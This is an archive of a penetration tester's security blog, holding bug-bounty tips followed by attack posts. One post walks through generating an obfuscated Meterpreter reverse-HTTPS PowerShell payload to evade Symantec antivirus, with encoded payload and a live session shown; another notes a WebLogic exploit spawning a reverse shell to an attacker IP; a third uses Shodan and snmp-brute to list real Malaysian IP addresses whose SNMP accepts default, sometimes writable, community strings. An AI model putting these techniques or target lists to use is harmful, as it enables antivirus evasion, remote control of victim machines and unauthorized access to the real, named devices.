I decided to venture into the world of bug hunting in late 2018. I started with hackerone, synack, bugcrowd and here are some of my tips & experiences in my virgin journey. For a start, I am a full time Cyber Security Advisor specializing in Penetration Testing and Incident Response. I have background in Vulnerability Assessment, SIEM and Compliance Testing. In total have been in IT security for more than 15 years of my career.
1. Bug hunting is by far the most challenging experience in my career. In my honest opinion, it beats any certification/training in the market. It is a great way to learn something from scratch. There are tons of materials on the Web. My suggestion is to read up on as much material you can get hold. Some good sites include hackerone public reports, Real World Bug Hunting and Web Hacking 101 by Peter Yaworski and Orange Tsai. Medium is a great place for blogs too.
2. Get a mentor if you can. It is much faster if you have someone more experience in bug hunting to help you get started. Though, not many people are willing to share their skills due to the competitive nature of bug hunting. Good places to look for help are people that you know in real life. Get involve in your local social/special interest group meetups. Nothing beats personal experiences than trying to direct message a cocky hacker on Twitter.
3. Look for easy bugs such as cross referer domain leaks, private information leaks to 3rd party, missing authorization, CSRF, etc. The reason why bug hunting is so difficult is because there are just so many hackers testing the same programme. By the time you start hunting, there have been over 100 bugs reported, so do prepare for duplicates after submission.
4. Practice report writing, special attention to impact. Different platforms have different expectations. All platforms expects bugs to be reproduceable based on your report, so make each bullet point clear and concise. After that, make sure the impact is clearly described. Avoid cutting and pasting VA reports. Some platforms will deduct your reputation points for hypothetical reports, so beware. Bug hunting reports are actual hacking PoC, you need to be able to carry out the attack and show the business impact. Include screenshots with descriptions on each step.
5. Do not give up. When I first started on hackerone, I was dipping under 100 rep points, but gradually manage to bring it up to 300+, I also made about USD3000 combined on different platforms. But the initial frustration almost made me give up. I can attest pen-testing in my day job is far easier than bug hunting.
6. Start with progammes that do not pay bounties. It is easier and more likely to find a bug than paid ones due to competitiveness. Once you have an idea, go ahead and shoot for paid bounties. Also, if you feel it is too difficult to find valid bugs on bug bounty platform, just test some random site, you'll be amazed at how easy it is to spot a bug (even severe ones) on websites that do not participate in bug bounties. But, pay special attention to the law as you might be crossing the line here. If they have a responsible disclosure programme, you may opt to inform them of your findings.
7. Try to understand what each platform or progamme is looking for. Eg. programme ABC is interested in content spoofing, so if you find such bugs, more likely they will pay for it. The same bug might not be accepted on programme XYZ, simply because their risk register are different, it is hard to say which bugs will be accepted but read their policy carefully.
8. Be respectful with both programme and platform staff. They get to determine if your bugs get triaged. Final say will be determine by the programme owner or platform staff.
9. Be creative with your bugs, if you expect to only hunt for the OWASP top 10, you will be disappointed. Such bugs are heavily hunted and like Pokemon, are less likely to appear. Be resourceful and read other hackers' reports and try to innovate. Do not copy and paste other hackers reports, you will most likely get rejected.
10. This is especially true on hackerone, it is easier to get an accepted bug on progammes that are not run by hacker one staff. I don't know why, but I feel the programme owners are more lenient with acceptable bugs than hackerone staff. This is just my observation.
11. Lastly, keep abreast with latest research in cyber security. There are many notable researchers in this field, eg. James Kettle and Orange Tsai are fine examples of pioneers that have dropped pretty big findings recently. Follow them on Twitter. Ben Sadeghipour, a notable hackerone hacker is also worth to follow as he has live telecast of bug bounty tips.
Overall, I am an old fart of 42 years but still learning and the guys I am learning are half my age. While most of my peers are now Head of Info Sec or CISOs, I choose to follow my mid life crisis; that is to continue to remain a tech guy. I'm getting better and my next year goal (2020) is to hit 900 reps on hackerone. It is definitely challenging to balance bug hunting with a family and a full time job but success is so sweet. I've made enough money from bounties in the last 4 months to buy my whole family a flight ticket to Europe for our holiday!
Saturday, November 30, 2019
Sunday, August 11, 2019
SEP AV Bypass For Meterpreter
Here is a simple method to bypass Symantec End Point AV from detecting Meterpreter. The technique is not unique and had been documented on other blogs. I take no credit for it but it is still worth its salt as I had some success using it during my engagements. This is really useful when you have gain a foothold on a victim host but you can't disable the AV because you don't have the password. Remember, most AV engines require additional password to disable it even though you already have SYSTEM privilege. So, the next best thing you can do is, try to bypass it. As long as you do not touch disk and execute code in mem, you could have a fair chance of evading but the HIPS (Host IPS) might be a pain, so I found this technique documented here. The difference is I used unicorn to further obfuscate the payload in ps1 format.
1. Firstly, the AV will most certainly catch the default certificate used by msf. To get around it, generate a fake certificate using msfconsole.
> set rhosts www.google.com
rhosts => www.google.com
msf5 auxiliary(gather/impersonate_ssl) > run
[*] Running module against 172.217.166.132
[*] 172.217.166.132:443 - Connecting to 172.217.166.132:443
[*] 172.217.166.132:443 - Copying certificate from 172.217.166.132:443
/OU=No SNI provided; please fix your client./CN=invalid2.invalid
[*] 172.217.166.132:443 - Beginning export of certificate files
[*] 172.217.166.132:443 - Creating looted key/crt/pem files for 172.217.166.132:443
[+] 172.217.166.132:443 - key: /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__624209.key
[+] 172.217.166.132:443 - crt: /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__236829.crt
[+] 172.217.166.132:443 - pem: /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__976059.pem
[*] Running module against 2404:6800:4001:80f::2004
[*] 2404:6800:4001:80f::2004:443 - Connecting to 2404:6800:4001:80f::2004:443
[-] 2404:6800:4001:80f::2004:443 - 2404:6800:4001:80f::2004:443 No certificate subject or CN found
[*] Auxiliary module execution completed
2. Now, generate its payload, I use reverse HTTPS with the fake cert.
msf5 auxiliary(gather/impersonate_ssl) > use payload/windows/meterpreter/reverse_https
msf5 payload(windows/meterpreter/reverse_https) > show options
Module options (payload/windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.8.103 yes The local listener hostname
LPORT 443 yes The local listener port
LURI no The HTTP Path
msf5 payload(windows/meterpreter/reverse_https) > set handlersslcert /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__976059.pem
handlersslcert => /root/.msf4/loot/20190318165057_default_172.217.166.132_172.217.166.132__976059.pem
msf5 payload(windows/meterpreter/reverse_https) > set stagerverifysslcert true
stagerverifysslcert => true
msf5 payload(windows/meterpreter/reverse_https) > generate -f psh-cmd
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAG <SNIP SNIP> ByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==msf5 payload(windows/meterpreter/reverse_https) > generate -f psh-cmd -o /tmp/works.txt
[*] Writing 7359 bytes to /tmp/works.txt...
3. Use unicorn to obfuscate /tmp/works.txt, you can remove "%COMSPEC% /b /c start /b /min " before exec unicorn.
# python unicorn.py /tmp/works.ps1
,/
//
,//
___ /| |//
`__/\_ --(/|___/-/
\|\_-\___ __-_`- /-/ \.
|\_-___,-\_____--/_)' ) \
\ -_ / __ \( `( __`\|
`\__| |\)\ ) /(/|
,._____., ',--//-| \ | ' /
/ __. \, / /,---| \ /
/ / _. \ \ `/`_/ _,' | |
| | ( ( \ | ,/\'__/'/ | |
| \ \`--, `_/_------______/ \( )/
| | \ \_. \, \___/\
| | \_ \ \ \
\ \ \_ \ \ / \
\ \ \._ \__ \_| | \
\ \___ \ \ | \
\__ \__ \ \_ | \ |
| \_____ \ ____ | |
| \ \__ ---' .__\ | | |
\ \__ --- / ) | \ /
\ \____/ / ()( \ `---_ /|
\__________/(,--__ \_________. | ./ |
| \ \ `---_\--, \ \_,./ |
| \ \_ ` \ /`---_______-\ \\ /
\ \.___,`| / \ \\ \
\ | \_ \| \ ( |: |
\ \ \ | / / | ;
\ \ \ \ ( `_' \ |
\. \ \. \ `__/ | |
\ \ \. \ | |
\ \ \ \ ( )
\ | \ | | |
| \ \ \ I `
( __; ( _; ('-_';
|___\ \___: \___:
aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Happy Magic Unicorns.
[*******************************************************************************************************]
-----Custom PS1 Attack Instructions----
This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro.
Note if choosing the macro option, a large ps1 file may exceed the amount of carriage returns allowed by
VBA. You may change the number of characters in each VBA string by passing an integer as a parameter.
Examples:
python unicorn.py harmless.ps1
python unicorn.py myfile.ps1 macro
python unicorn.py muahahaha.ps1 macro 500
The last one will use a 500 character string instead of the default 380, resulting in less carriage returns in VBA.
[*******************************************************************************************************]
[*] Exported powershell output code to powershell_attack.txt
3a. The obfuscated output is now in powershell_attack.txt which can be used on he victim host with AV.
# cat /home/gr00t/Downloads/unicorn/powershell_attack.txt
powershell /w 1 /C "s''v Ls -;s''v Ew e''c;s''v ixN ((g''v Ls).value.toString()+(g''v Ew).value.toString());powershell (g''v ixN).value.toString() ('cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlACAAYQBRAEIAbQBBAEMAZwBBAFcAdwBCAEoAQQBHADQAQQBkAEEAQgBRAEEASABRAEEAYwBnAEIAZAB <SNIP SNIP> wBCADEAQQBFAGsAQQBWAGcAQgB4AEEASABvAEEAYQB3AEIAcgBBAEcARQBBAGEBAEgAQQBBAFAAUQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFIAQQBCAHAAQQBHAEUAQQBaAHcAQgB1AEEARwA4AEEAYwB3AEIAMABBAEcAawBBAFkAdwBCAHoAQQBDADQAQQBVAEEAQgB5AEEARwA4AEEAWQB3AEIAbABBAEgATQBBAGMAdwBCAGQAQQBEAG8AQQBPAGcAQgBUAEEASABRAEEAWQBRAEIAeQBBAEgAUQBBAEsAQQBBAGsAQQBIAE0AQQBLAFEAQQA3AEEAQQA9AD0ACgA=')"
3b. Now, you can use msfconsole to catch the reverse https shell, execute powershell_attack on victim host after modifying the keywords vAlue.ToString() to avoid AV detection
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.8.106 yes The local listener hostname
LPORT 443 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Wildcard Target
meterpreter > exploit
[*] Started HTTPS reverse handler on https://192.168.8.106:443
[*] https://192.168.8.106:443 handling request from 192.168.8.104; (UUID: qbdxxru2) Meterpreter will verify SSL Certificate with SHA1 hash e27a4b10aeea1b1e22a1ee86d9a6d7f0584d08e9
[*] https://192.168.8.106:443 handling request from 192.168.8.104; (UUID: qbdxxru2) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 4 opened (192.168.8.106:443 -> 192.168.8.104:50302) at 2019-03-19 17:08:05 +0800
meterpreter > sysinfo
Computer : DESKTOP-O7UQ1HA
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
4. On the victim host, you'll notice that the AV did not trigger.
Tuesday, July 2, 2019
Exploiting CVE-2019-2725: Oracle WebLogic Server Deserialization
Introduction
Recent Oracle advisory pertaining a serious deserialization flaw that impacts WebLogic Servers version 10.3.6.0 & 12.1.3.0. This flaw is very trivial to exploit, leading to RCE with uid=1000(oracle) rights. There are exploits in the wild, the simplest one to use can be found in metasploit.
Installing Vulnerable Docker
To safely test this exploit without getting in trouble with the law, you can download a vulnerable docker container. Here is mine:
Detection
Easiest way to detect the instance of WebLogic is to use Nmap NSE script.
$ sudo nmap --script weblogic-t3-info -p 49163 127.0.0.1 -sSV
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-02 20:21 +08
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00013s latency).
PORT STATE SERVICE VERSION
49163/tcp open http Oracle WebLogic admin httpd
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 12.1.3.0)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.55 seconds
Exploitation
Fastest way to exploit this bug is to use "exploit/multi/misc/weblogic_deserialize_asyncresponseservice" in msfconsole:
Setup the RHOST, RPORT and PAYLOAD:
Once everything is in place, run the exploit against your docker container:
Exploit Analysis & Summary
This exploit is so easy to run that it is being used to randomly hit servers across the world to mine for crypto currency. It is basically a oneliner exploit, take a look at its payload in real time using tcpdump:
The payload sends a reverse shell in bash to an attacker ip address on port 4444. You can practically swap it out for anything, eg. RCE. Being so simple to exploit, you may think that most organizations had patched their systems already. Well, the mighty US DoD (US Department of Defense) was caught with their pants down during a bounty. Often the simplest things are the ones that catches us by surprise. During my pen-test engagements, very often I'd obtain critical findings from simple things like weak admin credentials, missing critical patches & stupid misconfigurations. So, if you are a pen-tester, always start with the basics. Enumerate the targets thoroughly, do not leave any stone unturned. The more you know about your targets the more likely you'll be able to hack it. The import piece is the detection/enumeration of vulnerabilities. The exploitation is usually easy once you know what you are after.
Friday, June 14, 2019
Evil-Droid Demo Part 1-3
Here are a few recorded PoCs of evil-droid by Mascerano Bachir in action. It was recorded for a security awareness talk that I will be presenting. Pretty cool tool, it decompiles an apk to insert your payload of choice. I just chose msf meterpreter, works like a charm.
Monday, March 25, 2019
Saturday, March 23, 2019
Exploiting SNMP For Fun & Profit
Introduction
The SNMP protocol is pretty much used for monitoring device system resources such as traffic utilization, uptime, OS or firmware version, processes, interface speed, etc. By default is listens on port 161/udp. It's an old protocol but still widely used to monitor traffic utilization, primarily on routers & switches. What I had stumbled upon is how many of these devices are easily exposed on the Internet with default community strings. Some belong to major ISPs. These devices handle Gigabits of traffic! Exploiting such devices are like taking candy from a child. Hackers could use it to launch amplification attacks, reroute traffic or take down Internet gateways.
Identification
The following are steps to identify these devices. I use Shodan command-line interface and Nmap NSE script.
1. Using Shodan to find open SNMP ports 161/UDP:
$ shodan download --limit 100 shodan-api-snmp.txt port:161 country:my
Search query: port:161 country:my
Total number of results: 9025
Query credits left: 92
Output file: shodan-api-snmp.txt.json.gz
[###################################-] 99% 00:00:01
Saved 100 results into file shodan-api-snmp.txt.json.gz
gr00t@adam:~/Downloads/snmp$ zcat shodan-api-snmp.txt.json.gz
{"_shodan": {"id": "5537b198-2081-4304-b4d6-4a39fa55cb2b", "options": {}, "ptr": true, "module": "snmp", "crawler": "70752434fdf0dcec35df6ae02b9703eaae035f7d"}, "hash": -1924632222, "os": null, "opts": {"raw": "30818202010004067075626c6963a275020466b16a5e0201000201003067306506082b06010201010100045942495041432d383530302e20482f573a20534844534c20284f72696f6e292076312e3030202f2048653130302f327878204353502076322e3320462f573a20352e35326831202831312053657074656d626572203230303729"}, "ip": 3680329889, "isp": "TM Net", "snmp": {"contact": "not set", "location": "not set", "name": "", "description": "BIPAC-8500. H/W: SHDSL (Orion) v1.00 / He100/2xx CSP v2.3 F/W: 5.52h1 (11 September 2007)"}, "port": 161, "hostnames": [], "location": {"city": "Alor Gajah", "region_code": "04", "area_code": null, "longitude": 102.20890000000003, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "78009", "dma_code": null, "country_code": "MY", "latitude": 2.3804000000000087}, "timestamp": "2019-03-23T07:31:41.164982", "domains": [], "org": "TM Net", "data": "BIPAC-8500. H/W: SHDSL (Orion) v1.00 / He100/2xx CSP v2.3 F/W: 5.52h1 (11 September 2007)", "asn": "AS4788", "transport": "udp", "ip_str": "219.93.96.161"}
{"_shodan": {"id": "9a89e29e-b932-4f36-9109-e232de48fa7f", "options": {}, "ptr": true, "module": "snmp", "crawler": "d264629436af1b777b3b513ca6ed1404d7395d80"}, "hash": 1282871131, "os": null, "opts": {"raw": "304802010004067075626c6963a23b020466b16a5e020100020100302d302b06082b06010201010100041f576972656c657373204e2047504f4e20726f75746572207769746820555342"}, "ip": 1743414711, "isp": "No.31-A, Jalan Tiara, Tiara Square", "snmp": {"contact": "", "location": "Taiwan", "name": "PMG5317-T20A", "description": "Wireless N GPON router with USB"}, "port": 161, "hostnames": [], "location": {"city": "Kuala Lumpur", "region_code": "14", "area_code": null, "longitude": 101.6757, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "59200", "dma_code": null, "country_code": "MY", "latitude": 3.1185000000000116}, "timestamp": "2019-03-23T09:51:25.626046", "domains": [], "org": "No.31-A, Jalan Tiara, Tiara Square", "data": "Wireless N GPON router with USB", "asn": "AS132435", "transport": "udp", "ip_str": "103.234.101.183"}
{"_shodan": {"id": "e5b20f51-0bb7-43d5-82a4-3250e41808d5", "options": {}, "ptr": true, "module": "snmp", "crawler": "d264629436af1b777b3b513ca6ed1404d7395d80"}, "hash": -625139007, "os": null, "opts": {"raw": "304302010004067075626c6963a236020466b16a5e0201000201003028302606082b06010201010100041a526f757465724f5320434352313030392d37472d31432d31532b"}, "ip": 762700881, "isp": "E-world Communication Sdn Bhd", "snmp": {"contact": "", "location": "", "name": "Empire-SVR-Eworld", "description": "RouterOS CCR1009-7G-1C-1S+"}, "port": 161, "hostnames": [], "location": {"city": null, "region_code": null, "area_code": null, "longitude": 112.5, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": null, "dma_code": null, "country_code": "MY", "latitude": 2.5}, "timestamp": "2019-03-23T09:47:30.036767", "domains": [], "org": "E-world Communication Sdn Bhd", "data": "RouterOS CCR1009-7G-1C-1S+", "asn": "AS134202", "transport": "udp", "ip_str": "45.117.228.81"}
{"_shodan": {"id": "771922cf-312e-4031-aa4a-af85290ccd78", "options": {}, "ptr": true, "module": "snmp", "crawler": "97b9d37f0484f45ce645307121c5c1ce0b3db578"}, "hash": -1001072405, "os": null, "opts": {"raw": "304602010004067075626c6963a239020466b16a5e020100020100302b302906082b06010201010100041d48502045544845524e4554204d554c54492d454e5649524f4e4d454e54"}, "ip": 717158293, "isp": "TM Net", "snmp": {"contact": "", "location": "", "name": "HP38F83B", "description": "HP ETHERNET MULTI-ENVIRONMENT"}, "port": 161, "hostnames": [], "location": {"city": "Kuala Lumpur", "region_code": "14", "area_code": null, "longitude": 101.73340000000002, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "54200", "dma_code": null, "country_code": "MY", "latitude": 3.1728999999999985}, "timestamp": "2019-03-23T09:36:25.155848", "domains": [], "org": "TM Net", "data": "HP ETHERNET MULTI-ENVIRONMENT", "asn": "AS4788", "transport": "udp", "ip_str": "42.190.247.149"}
{"_shodan": {"id": "77f8ef04-bd1c-4eaf-984b-e59ff45efe42", "options": {}, "ptr": true, "module": "snmp", "crawler": "70752434fdf0dcec35df6ae02b9703eaae035f7d"}, "hash": -1235570117, "os": null, "opts": {"raw": "3082004302010004067075626c6963a2820034020466b16a5e020100020100308200243082002006082b060102010101000414573334303056362d342e30364c2e30326a2d544d"}, "ip": 1009984985, "isp": "TM Net", "snmp": {"contact": "unknown", "location": "unknown", "name": "Innacomm", "description": "W3400V6-4.06L.02j-TM"}, "port": 161, "hostnames": [], "location": {"city": "Subang Jaya", "region_code": "12", "area_code": null, "longitude": 101.57119999999998, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "47600", "dma_code": null, "country_code": "MY", "latitude": 3.047300000000007}, "timestamp": "2019-03-23T10:30:20.120908", "domains": [], "org": "TM Net", "data": "W3400V6-4.06L.02j-TM", "asn": "AS4788", "transport": "udp", "ip_str": "60.51.37.217"}
{"_shodan": {"id": "c397faef-119c-4b8f-ad26-3a5cb8c7d041", "options": {}, "ptr": true, "module": "snmp", "crawler": "d264629436af1b777b3b513ca6ed1404d7395d80"}, "hash": 440659073, "os": null, "opts": {"raw": "3082003602010004067075626c6963a2820027020466b16a5e020100020100308200173082001306082b06010201010100040747455f312e3037"}, "ip": 1938119429, "isp": "TM Net", "snmp": {"contact": "D-Link", "location": "D-Link_DRS", "name": "DSL-2640B", "description": "GE_1.07"}, "port": 161, "hostnames": [], "location": {"city": "Kulai", "region_code": "01", "area_code": null, "longitude": 103.50110000000001, "country_code3": "MYS", "country_name": "Malaysia", "postal_code": "81000", "dma_code": null, "country_code": "MY", "latitude": 1.7258999999999958}, "timestamp": "2019-03-23T09:24:55.056330", "domains": [], "org": "TM Net", "data": "GE_1.07", "asn": "AS4788", "transport": "udp", "ip_str": "115.133.91.5"}
<SNIP>
2. Let's parse the json output into a single file:
$ shodan parse --fields ip_str shodan-api-snmp.txt.json.gz > targets.txt
$ cat targets.txt
219.93.96.161
103.234.101.183
45.117.228.81
42.190.247.149
60.51.37.217
115.133.91.5
210.19.179.86
121.122.166.97
113.23.179.42
103.61.127.245
1.32.80.202
182.54.207.75
103.17.19.202
120.138.81.35
175.140.15.124
115.135.244.248
42.1.62.96
219.93.64.141
210.48.146.83
175.141.79.16
113.23.212.106
60.54.109.118
175.142.123.117
1.32.62.0
1.32.90.160
115.134.8.170
58.26.91.82
175.139.6.34
175.141.78.76
103.47.253.101
115.135.132.10
175.140.191.30
60.54.83.34
103.220.5.9
124.82.71.180
60.50.161.155
175.140.58.66
219.93.121.26
110.4.40.111
110.159.66.68
182.54.209.62
<SNIP>
3. Now, use Nmap with NSE script snmp-brute to identify community default strings:
$ sudo nmap -iL targets.txt --script snmp-brute -p 161 -sU
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-23 20:07 +08
Nmap scan report for 219.93.96.161
Host is up (0.096s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 103.234.101.183
Host is up (0.021s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for 45.117.228.81
Host is up (0.027s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 42.190.247.149
Host is up (3.0s latency).
PORT STATE SERVICE
161/udp filtered snmp
Nmap scan report for 60.51.37.217
Host is up (0.030s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 115.133.91.5
Host is up (0.062s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 210.19.179.86
Host is up (0.011s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
<SNIP>
Nmap scan report for 103.17.19.202
Host is up (0.046s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| <empty> - Valid credentials
|_ public - Valid credentials
Nmap scan report for 120.138.81.35
Host is up (0.012s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for 175.140.15.124
Host is up (0.034s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 115.135.244.248
Host is up (0.040s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for cloud.eagleicvr.my (42.1.62.96)
Host is up (0.011s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 219.93.64.141
Host is up (0.059s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for automatchtask.company (210.48.146.83)
Host is up (0.012s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 175.141.79.16
Host is up (0.052s latency).
PORT STATE SERVICE
161/udp closed snmp
<SNIP>
Nmap scan report for 1.32.90.160
Host is up (0.040s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 115.134.8.170
Host is up (0.051s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 58.26.91.82
Host is up (0.011s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 175.139.6.34
Host is up (0.031s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 175.141.78.76
Host is up (0.042s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 103.47.253.101
Host is up (0.0095s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
<SNIP>
Nmap scan report for 124.82.71.180
Host is up (0.045s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 155.161.50.60.kbu01-home.tm.net.my (60.50.161.155)
Host is up (0.013s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for san-121-26.tm.net.my (219.93.121.26)
Host is up (0.19s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 110.4.40.111
Host is up (0.010s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 110.159.66.68
Host is up (0.023s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 182.54.209.62
Host is up (0.017s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
<SNIP ----- SNIP>
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 118.101.48.84
Host is up (0.016s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 183.171.225.98
Host is up (0.034s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 203.142.40.204
Host is up (0.021s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for mail.yunnamhc.com.my (221.133.35.75)
Host is up (0.011s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 1.32.86.122
Host is up (0.018s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 219.94.13.154
Host is up (0.014s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 60.51.66.36
Host is up (0.037s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 115.135.244.190
Host is up (0.031s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 115.132.33.5
Host is up (0.065s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 121.120.14.52
Host is up (0.99s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for access-intel-the.realalive.com (202.75.63.190)
Host is up (0.013s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 103.234.100.95
Host is up (0.021s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for 118.100.56.74
Host is up (0.019s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 60.48.27.223
Host is up (0.013s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
|_ public - Valid credentials
Nmap scan report for 203.106.189.15
Host is up (0.055s latency).
PORT STATE SERVICE
161/udp closed snmp
Nmap scan report for 1.9.76.70
Host is up (0.019s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
<SNIP>
Nmap scan report for 221.133.41.188
Host is up (0.013s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
Nmap scan report for 60.53.226.251
Host is up (0.017s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
| snmp-brute:
|_ public - Valid credentials
Nmap done: 100 IP addresses (88 hosts up) scanned in 59.20 seconds
4. Results with valid credentials for private means anyone can write to it. Some of these devices belong to small corporations or home users, but if you look carefully, sometimes you can find routers belonging to ISPs. From here, it's pretty much up to the hackers carnal desire on how he wish to exploit it. As usual, I do not condone any illegal activity such as unauthorized intrusion or modification or misuse to computers that you do not have explicit consent. I have tried on numerous occasions to reach out to warn them about this flaw.
Summary
This flaw might sound trivial to some, but for someone seeking malice, it could easily be turned into a weapon. The fault is lack of awareness on simple Cyber security hygiene. Often, simple mistakes make for easy pickings for hackers. It is only human to find quick and easy ways into an adversary network. While corporations spend millions in procuring the greatest security to protect their crown assets, the simplest solutions are often forgotten. I will be presenting my findings at Rawsec meetup #3, 2019. My slides will be up shortly.
Monday, March 4, 2019
Detecting Apache Struts2 Namespace Redirect OGNL Injection Vulnerability
LUA C0ding
